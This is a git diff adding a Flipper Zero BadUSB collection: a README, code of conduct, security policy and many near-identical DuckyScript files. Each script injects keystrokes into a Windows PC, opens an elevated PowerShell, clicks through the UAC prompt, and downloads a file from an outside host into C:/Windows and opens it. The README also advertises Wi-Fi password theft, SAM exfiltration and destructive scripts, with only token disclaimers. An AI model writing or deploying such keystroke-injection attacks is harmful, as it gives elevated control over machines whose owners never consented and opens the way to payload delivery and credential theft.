diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/CODE_OF_CONDUCT.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/CODE_OF_CONDUCT.md new file mode 100644 index 000000000..be8beae3d --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/CODE_OF_CONDUCT.md @@ -0,0 +1,128 @@ +# Contributor Covenant Code of Conduct + +## Our Pledge + +We as members, contributors, and leaders pledge to make participation in our +community a harassment-free experience for everyone, regardless of age, body +size, visible or invisible disability, ethnicity, sex characteristics, gender +identity and expression, level of experience, education, socio-economic status, +nationality, personal appearance, race, religion, or sexual identity +and orientation. + +We pledge to act and interact in ways that contribute to an open, welcoming, +diverse, inclusive, and healthy community. + +## Our Standards + +Examples of behavior that contributes to a positive environment for our +community include: + +* Demonstrating empathy and kindness toward other people +* Being respectful of differing opinions, viewpoints, and experiences +* Giving and gracefully accepting constructive feedback +* Accepting responsibility and apologizing to those affected by our mistakes, + and learning from the experience +* Focusing on what is best not just for us as individuals, but for the + overall community + +Examples of unacceptable behavior include: + +* The use of sexualized language or imagery, and sexual attention or + advances of any kind +* Trolling, insulting or derogatory comments, and personal or political attacks +* Public or private harassment +* Publishing others' private information, such as a physical or email + address, without their explicit permission +* Other conduct which could reasonably be considered inappropriate in a + professional setting + +## Enforcement Responsibilities + +Community leaders are responsible for clarifying and enforcing our standards of +acceptable behavior and will take appropriate and fair corrective action in +response to any behavior that they deem inappropriate, threatening, offensive, +or harmful. + +Community leaders have the right and responsibility to remove, edit, or reject +comments, commits, code, wiki edits, issues, and other contributions that are +not aligned to this Code of Conduct, and will communicate reasons for moderation +decisions when appropriate. + +## Scope + +This Code of Conduct applies within all community spaces, and also applies when +an individual is officially representing the community in public spaces. +Examples of representing our community include using an official e-mail address, +posting via an official social media account, or acting as an appointed +representative at an online or offline event. + +## Enforcement + +Instances of abusive, harassing, or otherwise unacceptable behavior may be +reported to the community leaders responsible for enforcement at +unc0v3r3d@proton.me. +All complaints will be reviewed and investigated promptly and fairly. + +All community leaders are obligated to respect the privacy and security of the +reporter of any incident. + +## Enforcement Guidelines + +Community leaders will follow these Community Impact Guidelines in determining +the consequences for any action they deem in violation of this Code of Conduct: + +### 1. Correction + +**Community Impact**: Use of inappropriate language or other behavior deemed +unprofessional or unwelcome in the community. + +**Consequence**: A private, written warning from community leaders, providing +clarity around the nature of the violation and an explanation of why the +behavior was inappropriate. A public apology may be requested. + +### 2. Warning + +**Community Impact**: A violation through a single incident or series +of actions. + +**Consequence**: A warning with consequences for continued behavior. No +interaction with the people involved, including unsolicited interaction with +those enforcing the Code of Conduct, for a specified period of time. This +includes avoiding interactions in community spaces as well as external channels +like social media. Violating these terms may lead to a temporary or +permanent ban. + +### 3. Temporary Ban + +**Community Impact**: A serious violation of community standards, including +sustained inappropriate behavior. + +**Consequence**: A temporary ban from any sort of interaction or public +communication with the community for a specified period of time. No public or +private interaction with the people involved, including unsolicited interaction +with those enforcing the Code of Conduct, is allowed during this period. +Violating these terms may lead to a permanent ban. + +### 4. Permanent Ban + +**Community Impact**: Demonstrating a pattern of violation of community +standards, including sustained inappropriate behavior, harassment of an +individual, or aggression toward or disparagement of classes of individuals. + +**Consequence**: A permanent ban from any sort of public interaction within +the community. + +## Attribution + +This Code of Conduct is adapted from the [Contributor Covenant][homepage], +version 2.0, available at +https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. + +Community Impact Guidelines were inspired by [Mozilla's code of conduct +enforcement ladder](https://github.com/mozilla/diversity). + +[homepage]: https://www.contributor-covenant.org + +For answers to common questions about this code of conduct, see the FAQ at +https://www.contributor-covenant.org/faq. Translations are available at +https://www.contributor-covenant.org/translations. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/README.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/README.md new file mode 100644 index 000000000..c2a7a7868 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/README.md @@ -0,0 +1,173 @@ + +# The Ultimate Flipper Zero Badusb Collection + + +![GitHub all releases](https://img.shields.io/github/downloads/UNC0V3R3D/Flipper_Zero-BadUsb/total?logo=GitHub) ![GitHub commit activity](https://img.shields.io/github/commit-activity/w/UNC0V3R3D/Flipper_Zero-BadUsb) ![GitHub repo size](https://img.shields.io/github/repo-size/UNC0V3R3D/Flipper_Zero-BadUsb) ![GitHub release (release name instead of tag name)](https://img.shields.io/github/v/release/UNC0V3R3D/Flipper_Zero-BadUsb?include_prereleases) +[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=jo.112.nas@gmail.com&lc=US&no_note=0&item_name=Thank+you+for+supporting+UNC0V3R3D's+Github+Project.&cn=&curency_code=EUR&bn=PP-DonationsBF:btn_donateCC_LG.gif:NonHosted) + + +# Before you start! + +Join the Discord-Community: https://discord.gg/WWQETvS8Vv
+Flipper Related Forum: ---- + +In order to begin, you ``must read and accept`` the usage agreement. **This project is for educational purposes only**! Please seek permission before running any of the scripts provided by me. I cannot be held responsible for any damage that may occur as a result of your use of these scripts. +If you want to purchase a completely unique and personalized script contact me on discord. +![](header.png) + +## Installation + +Windows: + +```sh +1. git clone https://github.com/UNC0V3R3D/Flipper_Zero-BadUsb.git + +2. Use the qFlipper app to drag the files into the "BadUsb" folder on your Flipper. +``` + +## Usage example + +To begin using the scripts, ``please carefully read`` the "readme.md" file provided with each script. This file contains ``important information`` on how to use the script safely. Keep in mind that some scripts may ``potentially harm your system``, so be cautious and do not run unfamiliar scripts on your personal computer. To test scripts, it is recommended to ``use a virtual machine`` for safety. + +## Release History + +* v1.0 + * Released all the files +* v1.1 + * CHANGE: More options on storing the grabbed Wifi Passwords (WifiPassStealer.txt) + * Added ``MEMZ.exe script`` +* v1.2 + * Added ``NoMoreSound.txt`` Script +* v1.3 + * A few delay_time errors ``fixed`` +* v1.4 + * Added a lot of new files to repo +* v1.5 + * Added ``DeleteMicrosoftStore.txt`` and fixed link to MEMZ.exe +* v1.6 + * Added a bunch of new files +* v1.7 (BIG UPDATE) + * Added ``a lot`` of new files, fixed a few files +* v1.7.1 + * Few fixes due to delay errors +* v1.8 + * Added ``ChangeWinUsername.txt`` and ``setWinPass.txt`` +* v1.9 + * Added a bunch of new files +* v2.0 + * Added ``DownLoadASCII`` and seperated ``Selfwriting`` Ascii + * Instant-download Ascii is about ``20x faster`` +* v2.1 + * Added readme files for every script + * Readme files contain ``important info`` about the script +* v2.2 + * Added the ``GoodUSB`` folder +* v2.5 + * Skipped a few releases + * Added a few files + * Fixed ``SAM exfiltration`` + +## Usage Agreement + +By downloading and using the scripts provided by UNC0V3R3D, you are automatically agreeing to the following usage agreement. If you do not agree to the terms of this agreement, you are not permitted to download or use the scripts. + +1. You acknowledge that UNC0V3R3D ``is not responsible`` for your actions or any damage you may cause as a result of using the scripts. +2. You are ``permitted`` to share all of the files. +3. You are ``allowed`` to modify the files, but are still responsible for your own actions. +4. If you are using my scripts in your own repo, please consider giving credits. +5. You are allowed to do everything the license says... + +# Instructions for newbies +In this quick instruction, you are going to learn how to set up the scripts and use them properly. +If you have any questions after reading this instruction, just DM me on Discord (UNC0V3R3D#8662). + +## Installation + +``` sh +1. Clone/Download the files directly from the repo or download the latest release. +2. Extract the files anywhere you like +3. If you are using a phone, just install the Flipper Zero mobile app. +4. If you are using a PC, just install the qFlipper app: https://flipperzero.one/update +5. Connect your Flipper via Bluetooth if you are using a phone, or connect it via usb if you are on PC. +6. Open qFlipper --> SD Card --> badusb --> Move the files here. +7. Now you are done with moving the files to your Flipper. + ``` + +## Explanation of the files + +Before using the files on your Flipper, it is important to thoroughly understand them. While the majority of the files in my BadUsb repository are relatively harmless, there are some that may potentially cause serious damage. It is important to exercise caution when using these files. + +

Understanding DuckyScript

+ +* All BadUsb-Scripts are written in the ``DuckyScript 1.0`` language. +* The language is kind of ``easy`` to understand and to learn. +* If you really want to look further into this please refer to this [Documentation]. +* The kind of ``hard part`` are the PowerShell scripts. +* We use PowerShell or PowerShell scripts in ``97%`` of all DuckyScripts. +* PowerShell or PowerShell scripts give us ``full power`` over the machine. +* If you want to learn how to write PowerShell scripts after learning the DuckyScript basics please refer to this [PowerShell-Guide]. +* In BadUsb scripts, you will most likely find comments every few lines, that start with the command ``REM`` at the beginning. +* Those comments often ``explain the whole process`` and help you a lot. +* That's how you understand certain BadUsb scripts, but you can also often already identify the script by its file name. + +

Using the scripts properly

+ +* So now that we have prepared everything, we can start to test our first script! +* We are going to run the first script on our ``own`` PC. +* Of course, you don't want to cause damage to your PC, so we are going to choose a harmless script. +* Let's choose a script that will draw something in the Notepad. +* I chose a [script] from my ASCII repository. +* If you want to open the text file on your phone or pc to see what is inside feel free to do so. +* To start you are going to start the Flipper and find the ``BadUSB`` category. +* There you will see all the scripts you have imported from your PC or phone. +* Now choose a harmless script and wait until the Flipper tells you to connect to a PC via the USB cable. +* Just press the middle button to start the script. +* Now the script should open Notepad and write a simple sentence "Hacked by UNC0V3R3D". +* If you succeeded congrats! You have just run your very first script. +* If something went wrong then please scroll further down to see the ``Troubleshooting section`` and follow the steps. + +

Troubleshooting Problems

+ +First of all, you have to identify the problem. Then you can look at the list below and maybe you will recognize your problem. + +* ``1.0`` The script open random things and typed the text somewhere, where it shouldn't be. + * So this is often caused by ``too short delays`` between the commands. In the BadUsb script file, you should see some commands, that start with ``DELAY`` + and then there is a number behind it. ``Example: DELAY 500``. The number stands for ``milliseconds``. Changing the delay to a ``higher number`` than the current number should solve the problem ``(DELAY 500 --> DELAY 700)`` + +* ``1.1`` The Flipper shows an error like this: ``ERROR: line 5`` + * If the Flipper prints random errors like this you should check the ``text file``. The most common thing causing this error is apparently a ``random blank line`` + between the commands. Otherwise, make sure there is no line containing the ``"LOCALE .."`` command. It doesn't properly work on the Flipper, yeah I do not know why that is. If there is still an error, look at the line where the error is coming from and make sure there is no ``space`` at the beginning of the line. + +* I hope that you find a a solution for your problem. If you need help feel free to always contact me via Discord or Email. + +[PowerShell-Guide]: https://www.youtube.com/watch?v=IABNJEl2ZWk +[Documentation]: https://web.archive.org/web/20220816200129/http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript +[script]: https://github.com/UNC0V3R3D/Flipper_Zero-BadUsb/blob/main/BadUsb-Collection/ASCII/Selfwriting/SimpleTroll.txt +[qFlipper]: https://flipperzero.one/update +[Patreon]: https://patreon.com/user?u=33918929&utm_medium=clipboard_copy&utm_source=copyLink&utm_campaign=creatorshare_creator&utm_content=join_link + +## Sponsoring + +[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Q5Q5HIDDD) + +## Meta + +If you have any idea on how to make this Instruction to BadUsb scripts better, feel free to open an Issue or contact me via Discord. :) + +UNC0V3R3D – [@GitHub](https://github.com/UNC0V3R3D) – unc0v3r3d@proton.me + +Distributed under the ``Attribution-NonCommercial-ShareAlike 4.0 International`` license. See ``LICENSE.md`` for more information. + +[https://github.com/UNC0V3R3D/Flipper_Zero-BadUsb](https://github.com/UNC0V3R3D/) + + +## Credits + +* [UberGuidoZ] , [FalsePhilosopher] and [I-am-Jakoby] +* Make sure to check them out! They are the reason this repository exists. When I started learning how to create badusb scripts i learnt from them. + + +[release]: https://github.com/UNC0V3R3D/Flipper_Zero-BadUsb/releases +[UberGuidoZ]: https://github.com/UberGuidoZ +[FalsePhilosopher]: https://github.com/FalsePhilosopher +[I-am-Jakoby]: https://github.com/I-Am-Jakoby diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/SECURITY.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/SECURITY.md new file mode 100644 index 000000000..234b131cb --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/SECURITY.md @@ -0,0 +1,9 @@ +# Security Policy + +- Our project includes scripts that can potentially harm devices. As such, we strongly advise against using these scripts without obtaining explicit permission to run these scripts. + +- By using these scripts, you assume all responsibility for any damage that may occur to your devices. The project maintainers will not be held liable for any harm caused by the use of these scripts. + +- Additionally, we advise against using these scripts on any devices that are important to you or that you do not have explicit permission to modify. The scripts may potentially damage or render devices inoperable. + +- Please use these scripts at your own risk and with caution. We do not condone any illegal or malicious activities. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/ghostbuster.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/ghostbuster.txt new file mode 100644 index 000000000..1d7eabb63 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/ghostbuster.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/ghostbusters.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/happyBday.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/happyBday.txt new file mode 100644 index 000000000..037b72893 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/happyBday.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.1 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/happyBDAY.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/indian-tech-support.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/indian-tech-support.txt new file mode 100644 index 000000000..bb329598e --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/indian-tech-support.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/indian-tech-support.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/koolaid.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/koolaid.txt new file mode 100644 index 000000000..c4617c2ad --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/koolaid.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/koolaid.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/memelaugh.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/memelaugh.txt new file mode 100644 index 000000000..45b62138a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/memelaugh.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/memelaugh.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbean.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbean.txt new file mode 100644 index 000000000..fac5139cd --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbean.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/mrbean.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbeanagain.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbeanagain.txt new file mode 100644 index 000000000..6f321c5c3 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbeanagain.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/mrbeanagain.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/ok.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/ok.txt new file mode 100644 index 000000000..db3392895 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/ok.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/ok.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefat.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefat.txt new file mode 100644 index 000000000..001ff6cc3 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefat.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/pepeFAT.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefrog.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefrog.txt new file mode 100644 index 000000000..68c4f4568 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefrog.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/pepeFROG.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/readme.md new file mode 100644 index 000000000..4b29c9dcb --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/readme.md @@ -0,0 +1,44 @@ + +# DownloadAscii + +These scripts will download an Ascii txt file and open it on the target pc. + + + + +## How to use? + +These scripts are easy to use. Just plug the Flipper in and run the scripts. Please notice that an internet connection is required. + + + + +## Features + +- Download .txt file +- open .txt file +- Fullscreen mode + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/riddle.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/riddle.txt new file mode 100644 index 000000000..0516a4483 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/riddle.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/riddle.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/stormtrooper.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/stormtrooper.txt new file mode 100644 index 000000000..d2959eca4 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/stormtrooper.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/stormtrooper.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface.txt new file mode 100644 index 000000000..f43a9f2df --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollface.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface2.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface2.txt new file mode 100644 index 000000000..a24b4a6c5 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface2.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollface2.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface3.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface3.txt new file mode 100644 index 000000000..2e43d4268 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface3.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollface3.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollfaceDANCE.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollfaceDANCE.txt new file mode 100644 index 000000000..9684603cf --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollfaceDANCE.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads the Txt file and opens it. +REM Version: 1.0 +REM Category: DownloadAscii +DELAY 1000 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollfaceDANCE.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" 